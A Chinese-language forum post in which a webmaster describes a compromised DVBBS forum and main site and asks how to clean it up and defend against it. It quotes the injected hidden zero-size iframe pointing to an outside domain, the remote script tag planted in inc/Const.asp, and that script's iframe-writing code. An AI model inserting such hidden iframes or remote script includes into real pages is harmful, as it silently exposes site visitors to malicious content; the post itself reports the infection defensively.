问题:

网站被攻击,最开始发现的是论坛,(用的是动网的dvbbs)

后来好像关联到了主站程序

现象都是一样被植入一段代码,如下

<iFrAmE SRc=http://m2126.com width=0 height=0 frameborder=0></IfRaMe>

最后在查找相关文件,发现在动网目录下inc/Const.asp 文件中找到了一段js,如下

<script language=javascript src=http://www.weber.eb.cn/jb.js></script>
js文件内容:

document.writeln("<iframe src=\"http:\/\/m2126.com\/\" width=\"100\" height=\"0\" frameborder=\"0\"><\/iframe>");


而且发现它的那段iframe的代码还可以直接插入我目录里的一个js文件里头

求高手帮忙解决下,给个防范的方法,如果可以,帮我分析下如果攻击的

谢谢啦........